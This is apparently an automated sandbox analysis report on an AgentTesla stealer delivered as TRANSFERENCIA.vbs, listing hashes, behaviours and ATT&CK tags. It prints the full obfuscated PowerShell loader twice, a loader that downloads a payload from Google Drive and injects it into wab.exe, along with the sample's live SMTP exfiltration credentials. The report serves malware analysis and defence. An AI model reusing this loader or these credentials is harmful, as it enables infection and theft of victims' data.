agenttesla | b85b4d8886e53ce696978b4adcab4d86508e0afcd76d19ba8c6d3eecb1c783d5

General

Target

TRANSFERENCIA.vbs
Size

34KB
MD5

517005eaa87af5cbed2939e0d64e80cc
SHA1

5c3252dbe3bc5d06917614fa3f6e686dc47eea4c
SHA256

b85b4d8886e53ce696978b4adcab4d86508e0afcd76d19ba8c6d3eecb1c783d5
SHA512

427422e159f5985653517ac797d10b87e88c7fed0032b5cae3b959315dce355568d2104d7533666e660745fbdf8bc21c884bb59559e04663c58491efa91a4f05
SSDEEP

384:fE/p5dFHavCyJgMTLz84CDIQMWkvCoL99G8FQRW+nbTTQuwvxnPxRiTwG+Ey:M/pRGHUMWkLJQ3ULPxRiTwG5y

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.roadsecurity.cl
Port:
587
Username:
[email protected]
Password:
@LGH!D54BAV1
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	1968	WScript.exe
7	2880	powershell.exe
9	2880	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com
12	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1512	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2528	powershell.exe
1512	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2528 set thread context of 1512	2528	powershell.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2880	powershell.exe
2528	powershell.exe
2528	powershell.exe
1512	wab.exe
1512	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2528	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	1512	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 2880	1968	WScript.exe	28
PID 1968 wrote to memory of 2880	1968	WScript.exe	28
PID 1968 wrote to memory of 2880	1968	WScript.exe	28
PID 2880 wrote to memory of 2728	2880	powershell.exe	30
PID 2880 wrote to memory of 2728	2880	powershell.exe	30
PID 2880 wrote to memory of 2728	2880	powershell.exe	30
PID 2880 wrote to memory of 2528	2880	powershell.exe	32
PID 2880 wrote to memory of 2528	2880	powershell.exe	32
PID 2880 wrote to memory of 2528	2880	powershell.exe	32
PID 2880 wrote to memory of 2528	2880	powershell.exe	32
PID 2528 wrote to memory of 2768	2528	powershell.exe	33
PID 2528 wrote to memory of 2768	2528	powershell.exe	33
PID 2528 wrote to memory of 2768	2528	powershell.exe	33
PID 2528 wrote to memory of 2768	2528	powershell.exe	33
PID 2528 wrote to memory of 1512	2528	powershell.exe	36
PID 2528 wrote to memory of 1512	2528	powershell.exe	36
PID 2528 wrote to memory of 1512	2528	powershell.exe	36
PID 2528 wrote to memory of 1512	2528	powershell.exe	36
PID 2528 wrote to memory of 1512	2528	powershell.exe	36
PID 2528 wrote to memory of 1512	2528	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TRANSFERENCIA.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Barks = 1;$Topographer='S';$Topographer+='ubstrin';$Topographer+='g';Function Sjettedele($Salamiers224){$Hngepilenes=$Salamiers224.Length-$Barks;For($Ellery=5; $Ellery -lt $Hngepilenes; $Ellery+=(6)){$Usvigeliges+=$Salamiers224.$Topographer.Invoke( $Ellery, $Barks);}$Usvigeliges;}function Slutakts($barfodede){. ($Turbomachine) ($barfodede);}$Cannon=Sjettedele 'FlourMInterotoeshzLoerdiPadlelSaalel BrigaBeskr/Evolu5Overh.Somme0Drivv Erhar(HymenWSnudeiFiskenU mand GigloVandbw t.ers.umar TestiNK.logTParch Hyrer1Parag0Proto. amni0Steam;Depot KommaWKnsoriDekomnEmolo6 Expi4 Arf ;Spade FlatxMicre6Nonin4Quibb;D.tas A.nonr S,ccvBeetr: Beta1klini2,ndif1Flget.Brdko0Filly)Faksi KrimiGOssiee LockcExcluk RheuoSyrup/Tpper2 Fugl0Flong1Un,on0Sc.at0Misso1T lde0Weekn1On,og GrandFRekapiTrninr SeameSkarrfTenoroForhoxHyper/ nfi1 Anis2I,dkr1 piri.Way,r0Marke ';$Indtegnendes=Sjettedele ' lpegUTyredsTi steOktalrBeskr- StaaA PetignedkreSlvbrnK ipetUstbl ';$Spidstagenes=Sjettedele 'Kn fihU.ormt revetRyledpsolp.s Quir:K rke/B,lig/Rumnedspa er SkuliBrystvHybrieHarmo.Un.qugManifoOmrysoNonsug PrimlFl.cneGastr.P.optcFascioWan.vm Prev/Ret iuUn ilcSke.t?Sindse P imx De,opEmpiroTungsr Anstt Foru=Sw.ppdC.ewso ,esrwCoroln CdrylCommaoFormoabere,d Unvi&Bedmmiskoled bsen=Neces1Eq.al9DyvleSFaultF ,ferPVicinyAronut BantkGueriXM.sicaUnderGMonodA,angiLPinkohVenosKFrsteaVedliH,yplaX SymmBbrrlusSfartGA,ndeGUnsusRUnderNKistezMorseQ PeleL Uops8IndrebFri,gwLochic Rec,7Rumst2 g,an ';$Fostervand=Sjettedele ' citr> Outr ';$Turbomachine=Sjettedele 'Ramphi multeKrokoxDefl ';$Filius='Calzada';Slutakts (Sjettedele ' ngeSMinibeAmbagtA.bej-IliadCKeptaoTendenBrucitAmokseEfflun Tro.t acks Matra- KnipPDkketaJoseptK,ydshInt.r ApprTProlo:Plica\ yrinP Soldr,upero V,rdgUncurrCallbaBuzzamSkraam c.theOutmartherii MesanSmovsgculotsalfansunde,tOpsvun S opiYouthn Yel,gTeg.teIndtarIntran ReveeEpope.Chaf,tAfsyrxBucortoct.p Notal-ek amVPaatvaIg,orl,eopau eurePa pe Propp$Virk,Fs ampiArmesl BveriWit iu Hu tsLivel;Amtsl ');Slutakts (Sjettedele 'Shovai.nvisfAwake kva(A,stetA dioeSwains Sygdt Refe-T ilepejerlaUdlodt Ki.ohAbor BrudfTSlee,:uldha\.nvalPHjertrSpiroo,illegBenhir BesvaBnnesm BogkmAntipeUnpasrColatiPutten MellgFosfosSpi usPalaetSymponDann,iP emenHempegR.gioe.polyrDirkenDaedae Solk.fartftValndxNeo,tt ansk)Smoog{ ImpreAtmogxSkrmkiFrdi.tEm ry}outcr; ,orm ');$Poltophagist = Sjettedele 'Misdeesc.vecPresph Fo.doBlo,d Legma%Misliap,lypp Ha.npSk upd FlleaVagtptPintaa Ukod% Bemy\SpiraFStri eKonfijEligilEvak,dTrstei noxis La ypCaatioUn efsblondiRe ivtKitabiRecupoRetsvnjoviae epbnArgum1Termi3 Sar 9Sprge.CompoGRepluaquashrM,rbl Oaten& Terg&Chino AnnameAdva.cTeksthRu.spoBeh,t Dyrlg$Encho ';Slutakts (Sjettedele 'Amoeb$ hromgCubitlunimmoTo,debDive.aDddruldac.y: BetoFInaquyNoncolSdm kd SavisSignatAnty o.ftegfEndo,fSub.reKonfir N rrn,karpe Pecu=Leuci(Ti,trcKydermInterd G.po Basti/Maka,cHertf oula$Cl.maP R.duo Skudlhyre.t.onapomr.edpUnroohs,ndea WormgHoejgiMe tas CardtProle) Stem ');Slutakts (Sjettedele 'Hdt.n$.adlegRe,inlVandsoGla,ibSp,ltaUn.nolWhoso: EfteOhoneyp FagkkStroprrerivvMagtsnstemmitriacnSlavig RenheDzoprrM.ioinRgslreWansh=Skdes$H,meoS adikpSplitiTrachdIndsns Lai.tStrana Stryg ,xoceLovrenSileteHessisEdite.MarinsCanadpKickbl sheeifredntEr,th(Uns a$ ArtiFBevrtoBrancsRadiktD,ntaeSkinnrFictivEyotaaOmfa nPand.dClock)Paa,t ');$Spidstagenes=$Opkrvningerne[0];Slutakts (Sjettedele 'M ion$MotivgOr.anlVirueoSk,idbO.eliaknsfol Fore:FrnutY,actin Duetd Omgrl TempiMallenske,pg Het.eEquivsSrprg=Syll NDeeske.ogstwNonde-FigurOsena,bKlockj SelveSvartc Co,ntB,ddy CalliSHo,osyBorebs RapstDiscoeKontom Bro . OutsN ApiaeL,rictBrode.Pri,iWPankre BrydbCookoC,lartlSjipniFilmieFejl nLuftmtAniso ');Slutakts (Sjettedele ' Modt$OvertY ManinObiisdTrbuklNerv,iFrihanBaasegIn,ereEnrols,malg.toil Hkabine fheaFre.sd ItaleTls.nrSadhesRetsp[Malac$kas.aIP.nacnU insdDra.atDokumeJ,risgNaziin .ermeStilen Statd BroneBazo.sExpec]Srt,l= fske$RoondCe,capaCa.slnSvinenSkimmo Asp,nOvers ');$Unsensibleness=Sjettedele 'VrnscY CrewnChorid Ratel Venei BirdnDiftegModifeEtlyss prin.InterDcaloroRavnew riftnEnkedlFinsko ManeaSideld.enerFForbriSildelcholoe Efte(Conci$Lde iSKattepStudiiSi kednecros u cotAss caOpho g ProleTornenBegreeExp,ssAl.ue,Farfa$ TolaASkruesRallya Lokam A,pob.ngullAkkomeMatria Delt)Nudib ';$Unsensibleness=$Fyldstofferne[1]+$Unsensibleness;$Asamblea=$Fyldstofferne[0];Slutakts (Sjettedele 'messi$Vaccigerhvel,eoeloInf,sbLs,sbaForunl Mode:CocciNFissio PternSkildcSkinkorangen Su,cf .nsuiCathirPretzmaft.eaEver t RecooEfterrRiddeyFremb=Rghtt(OmnivT NegaeForevsDoatet in e-Who ePBe,alaDelirtSallyh iver Stre.$InspiAPano.sCapybaInd rm SurrbR,awalbeknie.offfaMail.) pri ');while (!$Nonconfirmatory) {Slutakts (Sjettedele 'Balst$ Vi,ug ,rasl PdiaoParazbDulg,aExce.lBl,ci: ForvIFeelimon.inbFyrlaeKahytd .orssTetra5 Pron2,acer=Vildm$ Ant.tUnderrSuperuE.chye.edeh ') ;Slutakts $Unsensibleness;Slutakts (Sjettedele 'SandbSEstrutFundaaUrinrrT,itotImple-ProblSMe,relIrrate KonteSpirepBrems Spgef4Skalp ');Slutakts (Sjettedele '.lito$Judeag DysslUdstao amflbO.ervaDr nclSumm.:D magNAct.no S,ndn ktancLdr,ioAbe.rnTandbfEx.ggiY ffirComplm Forfa RasttColnao Sab.r ElecySplej=Besl (.fferTpynuneApronsSty,ktPul e-amomaP Forta DoedtprotohNajad Proto$Tor uASlugvs Skraa AdnomKatteb HabilSileneHinkea.uper)Jo.dr ') ;Slutakts (Sjettedele 'Windp$Sceneg Tru l Kre.oStalab Luv aNotarlSwoun:NseflMPlayroLysfopFlorepParoceUg.avnSimuldSammeeForpl= nobl$YeagegSemielLetvaoModstbPa.ala A ollSlipl:E,cloBBladmlEgnsuo Vgtko Mlkud ImdewAn,sooAffjeoS.inndMisnj+abonn+Jolle%U,der$TransOUnicepAlpenk SponrTele,vopstrnTestmiDeod.nHaidug FejlePaam,rAut mn Semie Regn. Atomc kolooflaaeu CaranSept t.odre ') ;$Spidstagenes=$Opkrvningerne[$Moppende];}Slutakts (Sjettedele 'Snurr$Cou.agAlocal Nassooxideb PhytaDi.pelSub.e:UsikrBLan ua.onsusFalsieB.lfom,ladho PoppdOutsne.terim Tikk stats=ra,ba stimeGDennie T,tat Tarm-RebriCmacedoBethunFjer.tTrindeSedd.nAgglutMuld. Inter$Mil.kAkindlsSinopas lkemakhyabTempll ProteSlimmaTedem ');Slutakts (Sjettedele 'Hov,d$antieg .andlV skeoTiaarbFal,ea util unp,:syne.A Byl bTerrad.astuuFuld,cNecrotDestai.dlndn Jor,g Decl mikke=Bundl Afkli[Sund.SAnarkyK.lsosSkadet,ansoeBeto mJulea.VeterC,errooMedunnuntruvKon me yperr JuratTofag]Snfte:Etage: De uFFi anrb.nkroVinddm CurrB GavlaPebblss gniePrice6Tr,ns4 UnosSUtaaltMonmorStikki Fejln f rtgFinhv(Retur$AlticBKoorda PhyssTrem,e ForsmBlankoRejsnd.urdae SotsmDe.ia)K,ppy ');Slutakts (Sjettedele '.oute$ TrimgAfskrl BideoBestnbE,denaOpflgl Halo:NatteUProcenTilslbStiffoB efou.oentn Res tBogt,e havboCacaluKalkusa bejl ysioyPa ta For i=Out h Slith[SleddS Outsy ammsKode tOutheeKrydsmUro,n. EstiTArbejeKabinx .omat Sl,t.IndsiE Af,jnAfholcSkil o Re ndCommaibismunS haagSuddd]Arbej:Summe:subheAQ adrSTilorCAbbanIIri,hIMilli. StudGove seForratSangtSL,dwit Flo.rSk,vgi B lbnFibrogAntad( Brad$coddlAUdsorbOverrdsl psuM.lticLeptitSubveiOpstnnCarolgunr e) Radi ');Slutakts (Sjettedele ',sept$brystg urrlphylloLowlibUnconaGennelFa,te:Skae,R SnapeC.lamgSodedumet ylVolumaskad t Kug,i Sti,vSal seMadglr.alkunSelvseRoser= G od$NeuroUGibbonWistebSammeoIndigu LinynNagsctLgdome BranoCradguLi,hosCopielG,avhyU.rel. Linos SikkuS.adobRefutsPottatEastnr V,atiudkrnn Red,gAfskr(Fusee3 Forg0L.bia5Notau8Kloe,0Imeri1,hanc,Udvan2Cardi9 T,si9Rekon7Gharr1A ati)Mixi. ');Slutakts $Regulativerne;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejldispositionen139.Gar && echo $"
    3⤵
    PID:2728
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Barks = 1;$Topographer='S';$Topographer+='ubstrin';$Topographer+='g';Function Sjettedele($Salamiers224){$Hngepilenes=$Salamiers224.Length-$Barks;For($Ellery=5; $Ellery -lt $Hngepilenes; $Ellery+=(6)){$Usvigeliges+=$Salamiers224.$Topographer.Invoke( $Ellery, $Barks);}$Usvigeliges;}function Slutakts($barfodede){. ($Turbomachine) ($barfodede);}$Cannon=Sjettedele 'FlourMInterotoeshzLoerdiPadlelSaalel BrigaBeskr/Evolu5Overh.Somme0Drivv Erhar(HymenWSnudeiFiskenU mand GigloVandbw t.ers.umar TestiNK.logTParch Hyrer1Parag0Proto. amni0Steam;Depot KommaWKnsoriDekomnEmolo6 Expi4 Arf ;Spade FlatxMicre6Nonin4Quibb;D.tas A.nonr S,ccvBeetr: Beta1klini2,ndif1Flget.Brdko0Filly)Faksi KrimiGOssiee LockcExcluk RheuoSyrup/Tpper2 Fugl0Flong1Un,on0Sc.at0Misso1T lde0Weekn1On,og GrandFRekapiTrninr SeameSkarrfTenoroForhoxHyper/ nfi1 Anis2I,dkr1 piri.Way,r0Marke ';$Indtegnendes=Sjettedele ' lpegUTyredsTi steOktalrBeskr- StaaA PetignedkreSlvbrnK ipetUstbl ';$Spidstagenes=Sjettedele 'Kn fihU.ormt revetRyledpsolp.s Quir:K rke/B,lig/Rumnedspa er SkuliBrystvHybrieHarmo.Un.qugManifoOmrysoNonsug PrimlFl.cneGastr.P.optcFascioWan.vm Prev/Ret iuUn ilcSke.t?Sindse P imx De,opEmpiroTungsr Anstt Foru=Sw.ppdC.ewso ,esrwCoroln CdrylCommaoFormoabere,d Unvi&Bedmmiskoled bsen=Neces1Eq.al9DyvleSFaultF ,ferPVicinyAronut BantkGueriXM.sicaUnderGMonodA,angiLPinkohVenosKFrsteaVedliH,yplaX SymmBbrrlusSfartGA,ndeGUnsusRUnderNKistezMorseQ PeleL Uops8IndrebFri,gwLochic Rec,7Rumst2 g,an ';$Fostervand=Sjettedele ' citr> Outr ';$Turbomachine=Sjettedele 'Ramphi multeKrokoxDefl ';$Filius='Calzada';Slutakts (Sjettedele ' ngeSMinibeAmbagtA.bej-IliadCKeptaoTendenBrucitAmokseEfflun Tro.t acks Matra- KnipPDkketaJoseptK,ydshInt.r ApprTProlo:Plica\ yrinP Soldr,upero V,rdgUncurrCallbaBuzzamSkraam c.theOutmartherii MesanSmovsgculotsalfansunde,tOpsvun S opiYouthn Yel,gTeg.teIndtarIntran ReveeEpope.Chaf,tAfsyrxBucortoct.p Notal-ek amVPaatvaIg,orl,eopau eurePa pe Propp$Virk,Fs ampiArmesl BveriWit iu Hu tsLivel;Amtsl ');Slutakts (Sjettedele 'Shovai.nvisfAwake kva(A,stetA dioeSwains Sygdt Refe-T ilepejerlaUdlodt Ki.ohAbor BrudfTSlee,:uldha\.nvalPHjertrSpiroo,illegBenhir BesvaBnnesm BogkmAntipeUnpasrColatiPutten MellgFosfosSpi usPalaetSymponDann,iP emenHempegR.gioe.polyrDirkenDaedae Solk.fartftValndxNeo,tt ansk)Smoog{ ImpreAtmogxSkrmkiFrdi.tEm ry}outcr; ,orm ');$Poltophagist = Sjettedele 'Misdeesc.vecPresph Fo.doBlo,d Legma%Misliap,lypp Ha.npSk upd FlleaVagtptPintaa Ukod% Bemy\SpiraFStri eKonfijEligilEvak,dTrstei noxis La ypCaatioUn efsblondiRe ivtKitabiRecupoRetsvnjoviae epbnArgum1Termi3 Sar 9Sprge.CompoGRepluaquashrM,rbl Oaten& Terg&Chino AnnameAdva.cTeksthRu.spoBeh,t Dyrlg$Encho ';Slutakts (Sjettedele 'Amoeb$ hromgCubitlunimmoTo,debDive.aDddruldac.y: BetoFInaquyNoncolSdm kd SavisSignatAnty o.ftegfEndo,fSub.reKonfir N rrn,karpe Pecu=Leuci(Ti,trcKydermInterd G.po Basti/Maka,cHertf oula$Cl.maP R.duo Skudlhyre.t.onapomr.edpUnroohs,ndea WormgHoejgiMe tas CardtProle) Stem ');Slutakts (Sjettedele 'Hdt.n$.adlegRe,inlVandsoGla,ibSp,ltaUn.nolWhoso: EfteOhoneyp FagkkStroprrerivvMagtsnstemmitriacnSlavig RenheDzoprrM.ioinRgslreWansh=Skdes$H,meoS adikpSplitiTrachdIndsns Lai.tStrana Stryg ,xoceLovrenSileteHessisEdite.MarinsCanadpKickbl sheeifredntEr,th(Uns a$ ArtiFBevrtoBrancsRadiktD,ntaeSkinnrFictivEyotaaOmfa nPand.dClock)Paa,t ');$Spidstagenes=$Opkrvningerne[0];Slutakts (Sjettedele 'M ion$MotivgOr.anlVirueoSk,idbO.eliaknsfol Fore:FrnutY,actin Duetd Omgrl TempiMallenske,pg Het.eEquivsSrprg=Syll NDeeske.ogstwNonde-FigurOsena,bKlockj SelveSvartc Co,ntB,ddy CalliSHo,osyBorebs RapstDiscoeKontom Bro . OutsN ApiaeL,rictBrode.Pri,iWPankre BrydbCookoC,lartlSjipniFilmieFejl nLuftmtAniso ');Slutakts (Sjettedele ' Modt$OvertY ManinObiisdTrbuklNerv,iFrihanBaasegIn,ereEnrols,malg.toil Hkabine fheaFre.sd ItaleTls.nrSadhesRetsp[Malac$kas.aIP.nacnU insdDra.atDokumeJ,risgNaziin .ermeStilen Statd BroneBazo.sExpec]Srt,l= fske$RoondCe,capaCa.slnSvinenSkimmo Asp,nOvers ');$Unsensibleness=Sjettedele 'VrnscY CrewnChorid Ratel Venei BirdnDiftegModifeEtlyss prin.InterDcaloroRavnew riftnEnkedlFinsko ManeaSideld.enerFForbriSildelcholoe Efte(Conci$Lde iSKattepStudiiSi kednecros u cotAss caOpho g ProleTornenBegreeExp,ssAl.ue,Farfa$ TolaASkruesRallya Lokam A,pob.ngullAkkomeMatria Delt)Nudib ';$Unsensibleness=$Fyldstofferne[1]+$Unsensibleness;$Asamblea=$Fyldstofferne[0];Slutakts (Sjettedele 'messi$Vaccigerhvel,eoeloInf,sbLs,sbaForunl Mode:CocciNFissio PternSkildcSkinkorangen Su,cf .nsuiCathirPretzmaft.eaEver t RecooEfterrRiddeyFremb=Rghtt(OmnivT NegaeForevsDoatet in e-Who ePBe,alaDelirtSallyh iver Stre.$InspiAPano.sCapybaInd rm SurrbR,awalbeknie.offfaMail.) pri ');while (!$Nonconfirmatory) {Slutakts (Sjettedele 'Balst$ Vi,ug ,rasl PdiaoParazbDulg,aExce.lBl,ci: ForvIFeelimon.inbFyrlaeKahytd .orssTetra5 Pron2,acer=Vildm$ Ant.tUnderrSuperuE.chye.edeh ') ;Slutakts $Unsensibleness;Slutakts (Sjettedele 'SandbSEstrutFundaaUrinrrT,itotImple-ProblSMe,relIrrate KonteSpirepBrems Spgef4Skalp ');Slutakts (Sjettedele '.lito$Judeag DysslUdstao amflbO.ervaDr nclSumm.:D magNAct.no S,ndn ktancLdr,ioAbe.rnTandbfEx.ggiY ffirComplm Forfa RasttColnao Sab.r ElecySplej=Besl (.fferTpynuneApronsSty,ktPul e-amomaP Forta DoedtprotohNajad Proto$Tor uASlugvs Skraa AdnomKatteb HabilSileneHinkea.uper)Jo.dr ') ;Slutakts (Sjettedele 'Windp$Sceneg Tru l Kre.oStalab Luv aNotarlSwoun:NseflMPlayroLysfopFlorepParoceUg.avnSimuldSammeeForpl= nobl$YeagegSemielLetvaoModstbPa.ala A ollSlipl:E,cloBBladmlEgnsuo Vgtko Mlkud ImdewAn,sooAffjeoS.inndMisnj+abonn+Jolle%U,der$TransOUnicepAlpenk SponrTele,vopstrnTestmiDeod.nHaidug FejlePaam,rAut mn Semie Regn. Atomc kolooflaaeu CaranSept t.odre ') ;$Spidstagenes=$Opkrvningerne[$Moppende];}Slutakts (Sjettedele 'Snurr$Cou.agAlocal Nassooxideb PhytaDi.pelSub.e:UsikrBLan ua.onsusFalsieB.lfom,ladho PoppdOutsne.terim Tikk stats=ra,ba stimeGDennie T,tat Tarm-RebriCmacedoBethunFjer.tTrindeSedd.nAgglutMuld. Inter$Mil.kAkindlsSinopas lkemakhyabTempll ProteSlimmaTedem ');Slutakts (Sjettedele 'Hov,d$antieg .andlV skeoTiaarbFal,ea util unp,:syne.A Byl bTerrad.astuuFuld,cNecrotDestai.dlndn Jor,g Decl mikke=Bundl Afkli[Sund.SAnarkyK.lsosSkadet,ansoeBeto mJulea.VeterC,errooMedunnuntruvKon me yperr JuratTofag]Snfte:Etage: De uFFi anrb.nkroVinddm CurrB GavlaPebblss gniePrice6Tr,ns4 UnosSUtaaltMonmorStikki Fejln f rtgFinhv(Retur$AlticBKoorda PhyssTrem,e ForsmBlankoRejsnd.urdae SotsmDe.ia)K,ppy ');Slutakts (Sjettedele '.oute$ TrimgAfskrl BideoBestnbE,denaOpflgl Halo:NatteUProcenTilslbStiffoB efou.oentn Res tBogt,e havboCacaluKalkusa bejl ysioyPa ta For i=Out h Slith[SleddS Outsy ammsKode tOutheeKrydsmUro,n. EstiTArbejeKabinx .omat Sl,t.IndsiE Af,jnAfholcSkil o Re ndCommaibismunS haagSuddd]Arbej:Summe:subheAQ adrSTilorCAbbanIIri,hIMilli. StudGove seForratSangtSL,dwit Flo.rSk,vgi B lbnFibrogAntad( Brad$coddlAUdsorbOverrdsl psuM.lticLeptitSubveiOpstnnCarolgunr e) Radi ');Slutakts (Sjettedele ',sept$brystg urrlphylloLowlibUnconaGennelFa,te:Skae,R SnapeC.lamgSodedumet ylVolumaskad t Kug,i Sti,vSal seMadglr.alkunSelvseRoser= G od$NeuroUGibbonWistebSammeoIndigu LinynNagsctLgdome BranoCradguLi,hosCopielG,avhyU.rel. Linos SikkuS.adobRefutsPottatEastnr V,atiudkrnn Red,gAfskr(Fusee3 Forg0L.bia5Notau8Kloe,0Imeri1,hanc,Udvan2Cardi9 T,si9Rekon7Gharr1A ati)Mixi. ');Slutakts $Regulativerne;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejldispositionen139.Gar && echo $"
      4⤵
      PID:2768
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
115d6753f20bce7c7cc29c99083ffa39

SHA1
75c255dcb8775ada1f5ae0cee927a070ae3758f6

SHA256
e494cfc0becbe069f7c32103d92b51e37e6972addd1c2af0b78cf216cce1cf7e

SHA512
e78be615ccaba94d84648dc77f07d74f91aaa87fe28051ceb2c84995a80003a90e3ffe2fa17da5c5697d0fc1ecf49fac27198fd3a430f81abe67b825917afe08

Download Submit
C:\Users\Admin\AppData\Roaming\Fejldispositionen139.Gar

Filesize
437KB

MD5
b9c1345525c273e06aa4e68508d456c5

SHA1
41fd50ace3b8720c9eb909253d71207001d11f99

SHA256
f3e62a8169763e17b6a4bb2af234bdb253967f6adddb04a980d16eb79b8fe4b3

SHA512
45c34bc340e06f67bf48d46ac3c7686bebc519d3c5a673aad2d62c122445bb752286eb53964b0f37d957fba4c306a7af9021afd812a8cde4a3d912b2b007cf31

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4U10XVT89QZCNP96B9GV.temp

Filesize
7KB

MD5
459b1a2ed612f9bca9d32e73d42fe13a

SHA1
d8b56453f06f55f37b5c15b06956d783e21125ae

SHA256
08aed25169c8cd295e56e21293a5f0afd8aee065a0896fdd1309d090de01734b

SHA512
369d5fe1433b1b8a225475a5fa4df1d8819e51099b5b120bb61152c76a0ebb3247e17b0ee71e0fd6b2cc6242a9ff78616285c5fe4b86c587bf3b8c9d42968ba1

Download Submit
memory/1512-67-0x00000000002D0000-0x0000000000312000-memory.dmp

Filesize
264KB

Download
memory/1512-65-0x00000000002D0000-0x0000000001332000-memory.dmp

Filesize
16.4MB

Download
memory/2528-39-0x00000000062F0000-0x0000000009E20000-memory.dmp

Filesize
59.2MB

Download
memory/2880-25-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-38-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2880-27-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2880-34-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-35-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2880-36-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2880-37-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2880-28-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2880-21-0x000000001B440000-0x000000001B722000-memory.dmp

Filesize
2.9MB

Download
memory/2880-26-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2880-24-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2880-23-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-66-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-22-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing